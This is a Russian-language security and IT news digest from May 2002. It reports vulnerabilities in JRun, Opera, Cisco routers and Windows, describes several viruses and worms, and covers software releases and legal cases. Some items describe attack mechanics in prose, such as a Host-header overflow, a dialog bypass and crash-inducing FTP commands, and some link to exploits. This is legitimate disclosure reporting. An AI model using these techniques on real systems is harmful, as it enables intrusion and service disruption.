Уязвимость позволяет злоумышленнику получить полный контрль над сервером, где установлен Macromedia JRUN. Если на сервер приходит запрос для .jsp ресурс, то JRun фильтр обрабатывает этот запрос. Далее, если после этого обращение к ISAPI.DLL идет напрямую, то ISAPI.DLL загружается как приложение. Сделав запрос с чрезмерно длинным полем Host в хедерах к DLL, адрес возврата в стеке перезаписывается позволяя атакующему контролировать запущенный процесс. Как только jrun.DLL загружается в адресное пространство процесса веб сервиса(inetinfo.exe), на ISS (Internet Informations Server) версии 4 или 5, любой код прикрепленный после длинного поля Host был выполнен с системными правами. Источник: http://online.securityfocus.com/archive/1/274528/2002-05-27/2002-06-02/0 Патч для исправления описанной выше уязвимости лежит здесь: http://www.macromedia.com/v1/Handlers/index.cfm?ID=22273&Method=Full
30/05/2002 Firestorm IDS IP Options Decoding Denial Of Service Vulnerability.
Найдена уязвимость в пакете обнаружения вторжений Firestorm, которая позволяет "повесить" эту программу. Для этого необходимо использовать специфические IP опции при отсылке пакетов. Продолжительная отслка такого трафика приводит к DOS. Подробности: http://online.securityfocus.com/bid/4871
29/05/2002 Microsoft предупреждает об ошибке в отладчике.
Microsoft предупредила пользователей Windows NT и 2000, что обнаруженная в инструментах отладки ошибка позволяет злоумышленникам получить полный контроль над системой, если у них уже есть доступ к ней на базовом уровне. Ошибка касается функции авторизации отладчика и позволяет любому пользователю исполнять на системе любую программу с наивысшими привилегиями. Используя ее в сочетании с другими уязвимостями Windows, удаленный злоумышленник может работать на системе как локальный пользователь. Microsoft присвоила уязвимости рейтинг критически опасной для клиентских систем, но пока не определила, какая часть компьютеров Windows NT 4.0 и Windows 2000 может пострадать. "Есть два ограничивающих фактора: необходимо предварительно войти в компьютер, а после этого нужно исполнить программу", - сказал менеджер по безопасности ПО Microsoft Кристофер Бадд (Christopher Budd). Например, попав в систему через гостевой вход, атакующий, чтобы использовать данную ошибку, должен запустить код. Это можно сделать только в том случае, если системный администратор предоставил гостям доступ к консоли и разрешил им вводить в машину программы, пояснил Бадд. Рекомендации и патч - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-024.asp
29/05/2002 Linux kernel 2.4.19-pre9 is out.
Вышла последняя pre версия стабильной ветки ядра Linux 2.4. Список изменений включает себя обновление и пополнений USB драйверов, исправлен kernel panic возникающий при компиляции gcc 3.1, обновление в aic7xxx драйвере, апдейты к поддержке PPC архитектуры. Апдейты поддержки sparc32 архитектуры, в том числе попытка исправить печально известный SRMMU баг. Анонс - http://linuxhacker.ru/linuxnews/2.4.19-pre9.txt
28/05/2002 Вышёл Adobe Acrobat Reader для Linux и Solaris.
Как сообщает linuxtoday.com, версия 5.05 Adobe Acrobat Reader для платформ Linux и Solaris сейчас доступна для скачивания с FTP-сервера Adobe. Тем не менее, официального анонса от Adobe пока не поступало и на Web-сайте Adobe значатся только платформы Windows и Mac. Cкачать можно отсюда - ftp://ftp.adobe.com/pub/adobe/acrobatreader/unix/5.x/
28/05/2002 Десятка самых "популярных" уязвимостей, используемых в Интернет (данные за первый квартал 2002 г.) .
На сайте securitylab.ru опубликована десятка самых популярных уязвимостей, которые использовали хакеры в первом квартале 2002 г. для получения неавторизованного доступа к серверам. Подозреваю, что это перевод, но перевод довольно качественный. Итак по распространённости и количеству атакованых хостов список выглядит следующим образом: 1.Code Red - MS Indexing Server/Indexing Services ISAPI Buffer Overflow Attack, 2.Nimda - Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Attacc, 3.Matt Wright Formmail attack, 4.WU-FTPD File Globbing Heap Corruption Attack, 5.SSH CRC32 Compensation Detection Attack, 6.Generic CDE dtspcd Buffer Overflow Attack, 7.Generic System V Derived Login Buffer Overflow Attack, 8.Generic SNMP PROTOS Test Suite Attacks, 9.Shaft DDoS Client To Handler Attack, 10.PHP Post File Upload Buffer Overflow Attack. Подробное описание - http://www.securitylab.ru/?ID=31091
28/05/2002 Уязвимости во многих FTP-серверах для Windows.
Эрик Сестерхен из Германии написал набор скриптов на Перле для проверки уязвимости различных серверов (переполнение буффера, формат строки и т.д.). Один из этих скриптов предназначался для проверки FTP-серверов. Скрипт посылал на вход сервера набор символов и проверял работоспособность сервера. Проверялись различные серверы с сайта www.download.com. В результате найдены ошибки в следующих версиях: FtpXQ (MKD AAAA.... (254 cимвола) - сервер падает), TransSoft's Broker FTP Server 5.0 Evaluation Version (CWD ..... - cервер падает), MeteorSoft Meteor FTP 1.2b (MKD AAA...AAA STOR AAAA...AAAA - сервер падает), Texas Imperial Software WFTPD (CWD ..... - возможен просмотр корневой директории). Автор предлагает желающим проверить другие FTP-серверы. Скрипт доступен по ссылке - http://www.kryptocrew.de/snakebyte/bed.html
28/05/2002 Выход новых версий броузера Opera.
Если Вы внимательно читали предыдущую новость-там было сказано о скором появлении новой версии Opera для Windows в связи с уязвимостью в версиях 6.01, 6.02 в ОС Windows (для других ОС версий больше 6.0 пока не существует). Сегодня Opera Software объявила об официальном выходе версий Opera 6.03 для ОС Windows и 6.01 для Linux. Источник - http://www.opera.com
28/05/2002 Возможность получения доступа к любому локальному файлу в Opera.
Как указывает GreyMagic Software из Израиля, существует возможность получения доступа к локальному файлу пользователя броузера Opera. Причём подобная уязвимость существует только в недавно вышедших версиях 6.01, 6.02 для ОС Windows. Уязвимость кроется в элементе <input type="file">, используемом при аплоаде (загрузка на сервер со стороны клиента) файлов на HTTP-сервер. Так как элемент типа "file" является чувствительным в части безопасности, все броузеры запрещают выставлять атрибут "value" (он работает в режиме "только для чтения"). Если бы можно было выставить что-нибудь в поле этого аттрибута (например, имя файла), то удалённый сервер получил бы возможность выкачивать файлы с локальной машины пользователя после подтверждения формы. В Опере при переходе от версии 6.0 к версии 6.01, 6.02 разработчики почему-то игнорировали подобную возможность аттрибута "value" и сервер получает возможность загружать локальные файлы с машины клиента. Правда, подобное возможно только после утвердительного ответа пользователя на диалог вида: "The files listed below have been selected, without your intervention, to be sent to another computer. Do you want to send these files?" GreyMagic нашли способ обхождения подобного диалога. Он заключается в выставке в качестве последнего элемента символа "& # 10;" (В HTML - код ASCII, обозначающий новую линию). При этом Опера игнорирует возможность ввода запроса пользователю. О подобном поведении Opera было сообщено разработчикам, которые обещали на днях выпустить новую версию броузера. Подробное описание и эксплоит - http://security.greymagic.com/adv/gm001-op/
27/05/2002 Спаммер-террорист угрожает свободе слова в Сети.
Лицо, представляющееся автором известной спаммерской программы "Advanced Mass Sender" (AMS) Максимом Терентьевым, рассылает по электронной почте угрозы участникам антиспаммерского форума OFISP, смысл которых - обещание рассылки по многим миллионам адресов писем с рекламой их компаний, что, по его мнению, приведет к неминуемому попаданию во всевозможные черные списки, а также к миллионам не поддающихся фильтрации писем. Противостояние спаммеров и противников спама продолжается уже много лет, практически со времен появления Интернета. Однако впервые в отечественной практике спаммер угрожает DDoS-атакой в отместку за свободный обмен мнениями, касающимися его программного продукта, - обмен, право на который гарантировано 29-1 статьей Конституции РФ, на которую так любят ссылаться сами спаммеры. Подробности - http://www.provider.net.ru/news.php3?ts=1022463679
27/05/2002 Cтатья "Dual-Booting FreeBSD and FreeBSD".
На сервере ONLamp опубликована статья, которая описывает, как можно настроиь свою FreeBSD-систему, чтобы обеспечить возможность загрузки 2-х версий FreeBSD-версий STABLE и CURRENT. Cтатья написана Майклом Лукасом, сетевым архитектором из фирмы Great Lakes Technologies, Торонто, Канада. Статья - http://www.onlamp.com/pub/a/bsd/2002/05/09/Big_Scary_Daemons.html
27/05/2002 Описание Exploit.WinNT.DebPloit .
Та же лаборатория Касперского опубликовала описание эксплоита для WinNT DebPloit. Он использует брешь в системе безопасности и распределения прав WinNT и позволяет любому процессу использовать права любого другого процесса. Возможности эксплоита позволяют, например, получить права системы или администратора (LocalSystem, Administrator) процессу, запущенному с минимальными привилегиями. Данный эксплоит работоспособен на Microsoft Windows NT 4.0 и Windows 2000, но только если на них не установлены обновления после 12 марта 2002 года. Неработоспособен на Windows XP. Источник - http://www.viruslist.ru
27/05/2002 Team - вирус под Windows 2000/XP .
Лаборатория Касперского опубликовала описание нового вируса под названием Team, который написан для работы в ОС Win2K/XP. Это Windows 2000/XP-совместимый вирус, который при заражении файлов использует метод "stream companion". Этот метод основан на возможности файловой системы NTFS создавать дополнительные блоки данных ("потоки" данных - streams), которые ассоциированы с конкретным файлом. Вирус является приложением Windows (PE EXE-файл). Имеет размер около 4K. При запуске вирус заражает все файлы в текущем каталоге и возвращает управление программе-носителю. При заражении файла вирус переносит его тело (стандартный поток) в новый поток (который имеет имя "ccc") и затем записывает свой код в стандартный поток файла. Таким образом, тело зараженного файла (стандартный поток) оказывается замещенным кодом вируса, а первоначалное содержимое файла оказывается перемещенным в его поток. При запуске зараженного файла Windows считывает и выполняет его стандартный поток (т.е. код вируса). Windows также показывает у всех зараженных файлов одинаковую длину - длину файла-вируса (поскольку Windows сообщает длину только основного потока файла). Подобный метод заражения должен работать на любой операционной системе, которая поддерживает NTFS, однако вирус проверяет версию ОС и исполняется только в Win2000/XP. Подробное описание - http://www.viruslist.com/index.html?tnews=1009&id=272838
27/05/2002 Linux на Sony Playstation2.
В Европе вышел набор для установки Linux на игровую приставку. Подробности - http://linuxplay.com/
27/05/2002 Cтатья "Preparing your linux box for the Internet. Armoring Linux".
Статья Ланса Спитзнера (Lance Spitzner) детально описывает шаги, которые необходимо выполнить перед тем, как выставить свой сервер с ОС Linux в Интернет. Может быть, она не столь интересна для опытных системных администраторов, но будет представлять несомненный интерес для тех, кто делает первые шаги в этом деле. Может рассматриваться, как краткое изложение книги "Securing and Optimizing Linux: RedHat Edition", редакция 1.3 которой была опубликована Герхардом Моурани (Gerhard Mourani). Дата последней модификации статьи 19 сентября 2000 г. Ccылка на статью - http://www.enteract.com/~lspitz/linux.html
26/05/2002 Выход Linux 2.5.18.
вышла очередная нестабильная версия ядра Linux. В эту версию девелоперского ядра вошел патч, который позволяет делать suspend- to-disk. Теперь ноутбукам под Linux будет жить еще легче. Так же довольно хорошо подправлен код, обслуживающий IDE. Ну а про всякие usb-audio и usb-storage даже говорить стыдно. ;-) Cоставлено на основании www.linuxnews.ru и новости от multik. Изменения - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.18
26/05/2002 Cтатья на www.securitylab.ru.
Называется "Новости от Шушпанчика". Некоторые моменты довольно спорны, некоторые притянуты за уши. Но для простого ознакомления можно и почитать. Кроме того-рекомендуем почитать дискуссию, развязавшуюся после опубликования подобных "новостей". :) Читать здесь - http://www.securitylab.ru/?ID=30965
26/05/2002 Британский женский колледж запрещает использование Microsoft Outlook.
Технический специалист колледжа Пол Маклафлин заявил, что "он устал от постоянной чистки компьютеров от очередной заразы, проникшей через дыру в Outlook". Несмотря на установленную защиту, вирус все равно проник и распространился в локальной сети колледжа вследствие чего, администратор запретил пользователям использовать OutLook при этом предоставив всем право выбрать любой другой почтовый клиент. Источник: http://www.compulenta.ru/2002/5/23/30026/
26/05/2002 Microsoft Active Directory security vulnerability.
В Active Directory server найдена уязвимость в постраничном(paged) поиске. Если передать длину страницы размером в 0 то Active Directory просто зависает. Тем не менее, уязвимость имеет невысокий риск, так как для ее исполнения нужен хотя бы анонимный вход, а если администратор позаботился о настройке сервера, то анонимный вход должен быть закрыт. Подробности: http://online.securityfocus.com/archive/1/273771/2002-05-23/2002-05-29/0
25/05/2002 Microsoft удалит Internet Explorer из Windows XP.
Компания Microsoft наглядно демонстрирует, как в будущем пользователи Windows XP смогут использовать любой браузер, почтовый клиент или медиаплеер вместо установленного в операционную систему. Как сообщает агентство Associated Press, первый Service Pack для Windows XP будет частично удовлетворять требованиям Министерства юстиции США по недопущению монополизма Microsoft в будущем.Представители Microsoft на этой неделе продемонстрировали обновленную версию Windows XP, в которой не используется браузер Internet Explorer, почтовый клиент Outlook или Windows Media Player. Программы не будут физически удалены из системы (Microsoft продолжает утверждать, что это невозможно), однако, в обновленной версии Windows XP пользователь сможет "скрыть" неиспользуемое программное обеспечение, сделав основным браузер или другое ПО производства другой компании. 40-мегабайтное обновление для Windows XP будет выпущено в августе этого года, и будет доступно для загрузки из сети либо на компакт-дисках. Возможность удаления middleware из Windows XP позволит производителям компьютеров устанавливать на них ПО других компаний, что раньше усиленно пресекалось софтверным гигантом. Представитель Microsoft описал этот процесс следующим образом: "Эти ребята (имеются в виду конкуренты Microsoft) будут платить сборщикам компьютеров за установку собственного ПО, а сборщики будут получать за это деньги... или что-то в этом роде". И, наконец, в обновление Windows XP будет встроен механизм борьбы с пиратскими копиями Windows XP, установленными на компьютеры пользователей. По заявлениям Microsoft, обновление будет определять легальность установленной Windows XP. В случае определения незаконности копии операционной системы, обновление откажется устанавливаться и будет блокировать пользователей при обращении к сайту Windows Update в дальнейшем. Источник - http://www.compulenta.ru/2002/5/24/30077/
25/05/2002 Дело о публикации кода программы DeCSS передано в Верховный суд штата Калифорния.
Фонд электронного фронтира (EFF) и организация First Amendment Project подали прошение в Верховный суд штата Калифорния о пересмотре решения аппеляционного суда по делу о распространении кода программы DeCSS сайтом журнала "2600". Ранее аппеляционный суд отказался пересматривать решение суда низшей инстанции о запрете на распространение программы сайтом хакерского журнала "2600". Эта судебная тяжба была инициированна Ассоциацией по контролю за копированием DVD-дисков (DVD CCA), которая обвинила руководство хакерского журнала в распространении программы DeCSS с собстенного сайта, что нарушает закон DMCA. DeCSS - это утилита для взлома защиты DVD-дисков, изначально использовавшаяся автором, голландским программистом, для просмотра DVD-фильмов на компьютере под управлением операционной системы Linux, для которой не существует официального DVD-проигрывателя. Позже схему обхода защиты DVD начали использовать пираты для копирования и распространения фильмов. Таким образом, после передачи дела в Верховный суд Калифорнии адвокатами EFF, обеспечивающими юридическую поддержку журнала "2600", разбирательство будет продолжено. Дело о запрете на распространение DeCSS примечательно конфликтом между законом о защите авторских прав DMCA и первой поправкой к Конституции США, гарантирующей свободу слова. Источник - http://www.compulenta.ru/2002/5/24/30071/
24/05/2002 Нашему сайту исполнился ГОД..
Дорогие наши поклонники и посетители, сегодня нашему сайту исполнился ровно ГОД. За этот год мы много чего достигли, не говоря уже о том, чего мы планируем достичь. Хотелось бы поблагодарить всех тех, кто помогал и поддерживал наши идеи, сайт и команду. Огромное спасибо и тем, кто поместил ссылки на наш сайт на своих страничках (более 100 сайтов). Надеемся, что следующий год будет еще более прогрессивным и мы не только выполним все обещанное (например выпуск компакт диска), но достигнем более новых высот, ведь совершенству нет предела!
24/05/2002 Уязвимость в CBOS.
Cisco Systems Inc. сообщает об обнаружении уязвимости в операционной системе для роутеров CISCO 600-й серии. Эти роутеры поставляются с собственной ОС - CBOS (Cisco Broadband Operating System). Уязвимости присутствуют в версиях до 2.4.4 включительно. Было обнаружено 3 их вида, все три приводят к DoS роутера. Первая (код CSCdw90020) заключается в том, что при посылке больших пакетов к DHCP-порту роутер замораживается. Вторая (код CSCdv50135) заключается в посылке большого пакета к сервису telnet (при этом необходимости в авторизации нет). Оба эти сервиса доступны на CBOS по умолчанию. Третья уязвимость (код CSCdx36121) заключается в некорректной обработке TCP/IP стэком больших перекрывающихся (overly) пакетов. После израсходования всей доступной памяти роутер "замораживается". CISCO рекомендует обновить CBOS до версии 2.4.5. При невозможности немедленного обновления перекрыть возможность посылки снаружи DHCP-пакетов и запретить сервис telnet. Подробное описание - http://www.cisco.com/warp/public/707/CBOS-DoS.shtml
24/05/2002 Очередные версии броузеров.
Помимо Netscape выходом очередных версий также осчастливили почитателей WWW-броузеров Mozilla и Galeon. Mozilla вышла версии 1.0rc3 (третий релиз кандидат), а Galeon (который многие заслуженно считают одним из самых лучших броузеров) - версии 1.2.2. Требует mozilla 1.0RC2 - взамен фиксит баги, улучшает просмотр исходного текста страниц. Cкачать Mozilla - http://ftp.mozilla.org/pub/mozilla/releases/mozilla1.0rc3/ Cайт поддержки Galeon - http://galeon.sourceforge.net
24/05/2002 Netscape 7.0 Preview Release 1.
Сообщается о выходе предварительно релиза новой версии популярного броузера Netscape. Похоже, что основан на Mozilla 1.0RC2. Изменений относительно 6.2.3 предостаточно - как между Mozilla 0.9.4.1 и 1.0RC2, но относительно Mozilla 1.0RC2 изменений практически никаких. Подробности - http://channels.netscape.com/ns/browsers/7/default.jsp
24/05/2002 Выход версии SSH 3.2.1.
Stephanie Schiebert-технический специалист, занятый в разработке и продвижении проекта SSH от SSH Communications Security Inc. анонсировал выход обновлённой версии этого продукта. На этот раз под номером 3.1.2. Были закрыты уязвимости предыдущих версий 3.0.x - 3.1.0 с включённым ключевым словом AllowedAuthentications. Описание уязвимости - http://www.ssh.com/products/ssh/advisories/authentication.cfm Новая версия доступна здесь - ftp://ftp.ssh.com/pub/ssh
23/05/2002 Возможность обхода межсетевого экрана AtGuard.
В этом фаерволле присутствует уязвимость которая позволяет любым программам без труда выходить в интернет не имея на то разрешения. Дело в том, что AtGuard не держит базу данных с путями и контрольными суммами для каждой программы, которая имеет доступ в интернет. То есть, если (IEXPLORE.EXE)Internet Explorer имеет разрешение выхода в интернет по 80 порту, то другая программа с именем файла IEXPLORE.EXE и лежащая в другой директории без труда может выйти в интернет через 80 порт. Даже если бы AtGuard не имел проверки только на контрольные суммы, это было бы не лучше - дело в том, что к любой программе можно добавить дополнительную часть кода, которая тоже будет исполняться под общим именем программы и в таком случае может только помочь проверка контрольной суммы. Источник: http://www.it-checkpoint.net/advisory/13.html
23/05/2002 Возможность DoS в CISCO.
Как сообщает BUGTRAQ в ОС для CISCO - IOS обнаружена уязвимость, позволяющая при посылке множества сообщений типа ICMP Redirect привести к неработоспособности CISCO. Уязвимость присутствует в версиях IOS- 11.0-1,3, 12.0 на платформах - Cisco 1005,1603, 2503. Для проведения атаки использовалась программа icmp_redflod.c. Подробности - http://www.phenoelit.de/stuff/CiscoICMP.txt Исходники icmp_redflod - http://www.phenoelit.de/irpas/icmp_redflod.c
23/05/2002 Документ по Cross Site Scripting (CSS) уязвимостям.
Компания iDEFENSE Labs из города Chantilly (штат Вайоминг, США) выложила в Интернет документ, детально рассматривающий уязвимость типа CSS. Представляет интерес для Web-разработчиков. Для заинтересованных ссылка приведена ниже. Другое название для CSS-XSS. Документ доступен здесь - http://www.idefense.com/XSS.html FAQ по CSS (XSS) - http://www.cgisecurity.com/articles/xss-faq.shtml
23/05/2002 Обновление утилит для FreBSD.
Вышли обновления утилит для FreeBSD-k5su и bzip2. Обновления связаны с нарушениями системы безопасности в старых версиях утилит. k5su-это утилита для получения прав суперпользователя с применением Kerberos. Старая версия позволяла успешно стать суперпользователем, при отсутствии пользователя в группе wheel (естественно, для этого необходимо было знать пароль рута). Уязвимость утилиты bzip2 связана с некорректными установками режимов доступа к файлу при его архивировании и разархивировании. Утилиты доступны из списка портов. Новые версии утилит - http://www.freebsd.org/ports/
23/05/2002 Конференция по безопасности CSICON.
19-21 августа сего года в Hyatt Regency в Калгари (провинция Альберта, Канада) пройдёт ежегодная конференция по безопасности CSICON (Canadian Security & Intelligence Conference). Как написано в анонсе-эта конференция предназначена для IT-профессионалов и IT-секьюрити менеджеров. Подробности - http://www.csicon.net
23/05/2002 Выход Solaris 9.
SUN Microsystems выпустила Solaris 9. Из усовершествований отметим, что SUN ONE Directory Server (бывший Netscape DS), SUN ONE Application Server, Resource Manager и SunScreen теперь включены в базовую поставку. Недавно SUN приостановила разработку Solaris для x86, собираясь выпустить свои дистрибутив Linux для x86; таким образом эта версия Solaris доступна только на "стратегической" для SUN платформе SPARC. Подробности - http://www.sun.com/2002-0522/feature/
22/05/2002 Обнаружена уязвимость в программе fetchmail для Linux.
В новой версии fetchmail 5.9.10 устранены серьезные уязвимости связанные с отсутствием проверки числа сообщений, которое сообщает отсылающий сервер. При получении почты с сервера IMAP клиент fecthmail выделял массив для хранения информации о размере сообщений. Размер массива определялся числом сообщений, информация о которых предоставлялась сервером. Ранние версии fecthmail не проверяли такую информацию на соответствие размерам выделенного массива, что потенциально могло привести к записи данных вне границ массива. Источник: http://www.compulenta.ru/2002/5/22/29975/
22/05/2002 Microsoft SQL Spida Worm Propagation.
Серверы Microsoft SQL Server во всем мире подверглись ожесточенной атаке червя Spida (js.spida.b.worm, известен также под именами Double Tap и SQLSnake). Червь, написанный на JavaScript, забирается в системы с пустыми учетными записями системного администратора, активно сканируя порт 1433. Червь содержит троян и программу для сканирования, с помощью которых он начинает поиск новых уязвимых систем и собирает пароли, которые он отсылает на почту своему создателю. В BugTraq репорте отмечается, что червь не в состоянии собирать пароли если в сестеме включена защита паролей SysKey. Подробности: http://www.zdnet.ru/?ID=191671
21/05/2002 Winamp хранит пароли в открытом виде.
Как указывает в BUGTRAQ isox(isox@chainsawbeer.com), если winamp в режиме потокового аудио и при обращении к URL требуется прохождение аутентификации (ввода имени пользователя и пароля), winamp сохраняет их в чистом (незашифрованном) виде в файле winamp.ini в секции [HTTP-AUTH]. Хранятся они в виде: TL>=<username>:<password>. История посещённых URL также хранится в этом файле в секции [winamp]. Таким образом, если обращение к серверу ресурсов осуществлялось в виде http://username:password@site, также возникает возможность просмотра аутентификационных данных. Автор письма тестировал версию Winamp 2.80 на Windows XP Источник - http://www.securityfocus.com
21/05/2002 Выход FreeBSD 4.6 Release Candidate 2.
Продолжая тему новых дистрибутивов в мире UNIX ОС, отметим выход очередной версии FreeBSD - 4.6 RC2. Из основных изменений (по материалам linux.org.ru): новая утилита atacontrol(8) для контроля драйвера ata(4), старая утилита last(1) научилась показывать год с помощью флага -y, всем известная ls(1) теперь может отображать размер файлов в более компактном формате при помощи -h, patch(1) в конце концов научилась работать с файлами изменений напрямую при помощи -i, при запуске reboot(8) можно указать какой кернел затем загружать при помощи -k, tftp(1) и tftpd(8) поддерживают теперь IPv6, sendmail обновлён до версии 8.12.3, что привело к неиспользованию SUID root в его работе, XFree86 4.2.0 теперь является основным и ставится по умолчанию. Подробности - ftp://ftp.freebsd.org/pub/FreeBSD/releases/i386/4.6-RC2/RELNOTES.HTM
21/05/2002 Выход очередных версий ядра Linux.
Вчерашний день ознаменовался выходом сразу двух версий ядра Linux. Cерия 2.2 обновилась до 2.2.21. Изменения состоят, в основном, из багфиксов драйверов и их обновлений из 2.4. Серия 2.4 пополнилась версией от Алана Кокса 2.4.19pre8-ac5. Часть изменений уже отправлена Марцело, который занимается релизом стабильных версий ядра. Многие изменения касаются устройств aacraid и i2o. Changelog 2.2.21 - http://www.kernelnewbies.org/changelogs/2.2.21 Описание 2.4.19pre8-ac5 - http://linuxtoday.com/news_story.php3?...
21/05/2002 Внимание: всем кто искал образы установочных дисков Sun Solaris 8.
По данной ссылке лежит список серверов где это можно скачать: http://www.filesearch.ru/cgi-bin/s?q=solaris+iso&t=f&w=a&x=0&y=0
20/05/2002 Обновлена статья "Локальный и удаленные взломы Windows NT/2000"..
Добавлен новый метод локального взлома Windows NT/2000. Он позволяет абсолютно любому пользователю с любыми привилегиями повысить свои права до любого уровня. Это стало возможным после обнаружения EliCZ'ом ошибки в подсистеме безопасности Windows NT/2000. Данный эскплоит получил название DebPloit. Ознакомиться: http://www.uinc.ru/articles/29/index.shtml
20/05/2002 Kernel Traffic #167.
Сегодня Zack Brown выпустил очередной Kernel Traffic #167 - недельный анализ текущих работ, выполненных при разработке нового ядра Linux. Для заинтересованных - http://kt.zork.net/kernel-traffic/kt20020520_167.html
20/05/2002 Выход OpenBSD 3.1.
19 мая в список рассылки announce@openbsd.org поступило официальное извещение о выпуске новой версии OpenBSD-версии 3.1. Как отмечают авторы, в этом году отмечается 4 года, как в OpenBSD не нашли ни одного удалённого (remote) эксплоита. В новой версии: улучшена поддержка "железа" (архитектура UltraSPARC, 802.11b(беспроводные сети), работа крипто-драйверов на всех PCI-платформах, поддержка MacPowerPC, поддержка PCI SCSI-контроллера Tekram TRM-S1040, звуковой карты Creative SB Live!), улучшена работа пакетного фильтра pf, улучшена система безопасности (включены различные патчи, которые были необходимы для предыдущей версии), поддерживаются новые аттрибуты файловой системы, улучшена поддержка портов, модули ядра поддерживают ELF-бинарники, улучшена работа виртуальной памяти и многое другое. В состав ОС входят: ALTQ с большим количеством поддерживаемых сетевых карт, XFree86 4.2.0, sendmail 8.12.2, KAME IPv6, KTH Heimdal-0.4e, OpenSSH 3.2. В дистрибутиве также остались Х-сервера от старой версии XFree86 3.3.6 для поддержки старых видеокарт, которые сейчас не поддерживаются в новых релизах XFree86. Как отмечают разработчики, это уже 12-й релиз их ОС, и 11-й релиз, доступный на CDROM. CDROM (3 штуки) продаются по цене 40$. В настоящий момент ОС поддерживает платформы: i386, alpha, sparc, sparc64 (UltraSPARC), macppc, hp300. Подробности - http://marc.theaimsgroup.com/?l=openbsd-announce&m=102184254632745&w=2
20/05/2002 Кредитка за один доллар.
Кража кредитных карт - кардинг - набирает обороты: интересующиеся могут свободно, с помощью Google, найти ссылки на сайты, которые открыто торгуют ворованными кредитками. Стандартная цена за карточку - от 40 центов до 5 долларов, большинство продавцов находится в бывшем СССР, покупатели напротив концентрируются на Дальнем Востоке, жертвы - в основом граждане США и Европы. Виртуальные базары устроены почти как настоящие биржи, цены колеблются в зависимости от спроса. Располагаются же они в основном на взломанных страницах и поэтому недолговечны - большинство таких страниц живёт лишь пару дней. Эксперты сходятся на мнении, что центром мирового кардинга является Санкт-Петербург, где кредитки уходят с прилавка партиями по 500-5000 штук по цене 1$ за штуку. Добываются же кредитные карты путём взлома крупных финансовых фирм: в прошедшем году после отказа платить хакерам деньги за молчание, CD Universe призналась в утере базы данных из 300.000 карт. По материалам - http://www.bugtraq.ru
20/05/2002 Торговый комитет американского Сената поддерживает закон о компьютерной безопасности.
На недавнем заседании комитета по коммерции Сената США было принято решение о поддержке законопроекта о компьютерной безопасности. Этот проект предусматривает выделение почти 900 миллионов долларов в виде грантов и стипендий на исследования в области информационной безопасности и обучение специалистов. Как сообщает Reuters, законопроект не встретит особых преград и легко добьется поддержки всего Сената. Коммерческие структуры позитивно отнеслись к подобным мерам, с учетом того, что угроза со стороны хакеров и вирусописателей в последние несколько лет значительно возросла. ФБР то и дело сообщает о новых расследованиях, связанных с хакерскими атаками и взломами сайтов крупных компаний, но ситуация от этого легче не становится. Подобный законопроект в феврале этого года легко получил одобрение Палаты представителей (нижней палаты американского Конгресса), что, учитывая все еще свежую память об атаке 11 сентября, неудивительно. В законопроекте нижней палаты, кстати, предусматривается ужесточение наказания для хакеров. На том же заседании Комитета по коммерции принято решение о поддержке "антиспаммерского" законопроекта. Этот документ дает Федеральной торговой комиссии США право налагать крупные штрафы на компании, занимающиеся рассылкой спама. За каждую копию, в случае принятия такого закона, компании придется выплачивать 10 долларов, однако максимально допустимая сумма штрафа составит не более 500 тысяч долларов. Более подробно - http://www.compulenta.ru/2002/5/18/29784/
19/05/2002 ФБР расследует взлом баз данных компаний Experian и Ford Motor Credit.
Как сообщает Internet News, ФБР расследует хакерские атаки на сайты финансовых компаний Ford Motor Credit и Experian. В результате этих "налетов" была похищена конфиденциальная информация о 13 тысячах пользователей (из них, правда, только 400 - клиенты Ford). Из базы данных оказались выкачаны номера социальных страховок, адреса, номера счетов, имена кредиторов и сведения о платежах - все, что нужно для мошенничества. Результат не заставил себя долго ждать: в феврале в Experian начали поступать многочисленные сообщения о поддельных чеках, якобы выданных одним из подразделений Ford Credit. ФБР, по сообщению Associated Press, отказывается раскрывать детали расследования. Источник - http://www.internetnews.com/
19/05/2002 На FTP-сервере выложен ISO-образ FreeBSD-4.6-RC1.
Мюррэй Стокли (Murray Stokely) сообщил, что ISO-образ FreeBSD-4.6-RC1 для i386 доступен с ftp://ftp2.FreeBSD.org/. Сборка для платформы alpha будет доступна в ближайшие сутки. Руководство тестера - http://www.freebsd.org/releases/4.6R/qa.html
19/05/2002 Linus Torvalds: Linux 2.5.16.
Новое ядро "нестабильной ветви". Скачать - http://www.kernel.org ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.16
19/05/2002 Новый червь Kazaa.Benjamin.
"Лаборатория Касперского" сообщает об обнаружении сетевого червя "Worm.Kazaa.Benjamin", распространяющийся по пиринговой сети KaZaA. Benjamin - не первый известный червь, использующий общедоступные сети обмена файлами и технологию P2P. Например, в свое время червь, написанный на Visual Basic распространялся по сети Gnutella. Однако, как сообщают в "Лаборатории Касперского", до сих пор сеть KaZaA эта участь обходила стороной. Источник - http://www.compulenta.ru/2002/5/18/29762/
18/05/2002 Вышел GNOME 2.0 Desktop Beta 5.
Вышла 5-я бета нового релиза GNOME (2.0). Выложена на FTP-сервере и доступна для тестирования и нахождения багов. По сравнению с Beta 4 устранено 334 бага. Скачать можно здесь - http://ftp.gnome.org/pub/GNOME/pre-gnome2/releases/gnome-2.0-desktop-beta5/
18/05/2002 Обновились программы для GNOME.
Обновились программы для GNOME (графическая оболочка для LINUX). BALSA-почтовый клиент, почтовый клиент с поддержкой POP3, IMAP, до версии 1.3.6. Gnochive-gnome-клиент для работы с архивами tar, gzip, bz2, zip, compress, zoo, lha, arj, ace, cpio, rpm, до версии 0.7.0. Подробности и ссылки - http://linuxtoday.com/news_story.php3?ltsn=2002-05-18-003-26-NW-GN-RL
18/05/2002 Суд Сиэтла отклонил иск Microsoft к компании Lindows.
Как сообщил вчера сайт linuxtoday, судья Coughenour из Сиэтла отклонил все претензии софтверного гиганта Microsoft к фирме Lindows, которая, по заявлению Microsoft, якобы не имела права использовать название Lindows, поскольку оно напоминает название Windows. Судья сказал, что, изучив большое количество литературы (в том числе словари, материалы в Интернет и т.д.), он пришёл к выводу, что термины 'windows,' 'window' и 'windowing' являются просто ссылками на графический интерфейс пользователя. Представители Microsoft c этим категорически не согласны и говорят, что суд, по их мнению пришёл к неправильному заключению. Более подробно - http://linuxtoday.com/news_story.php3?ltsn=2002-05-16-013-26-NW-LL Первоисточник - www.lindows.com/opposition
17/05/2002 Вышел OpenSSH 3.2.2.
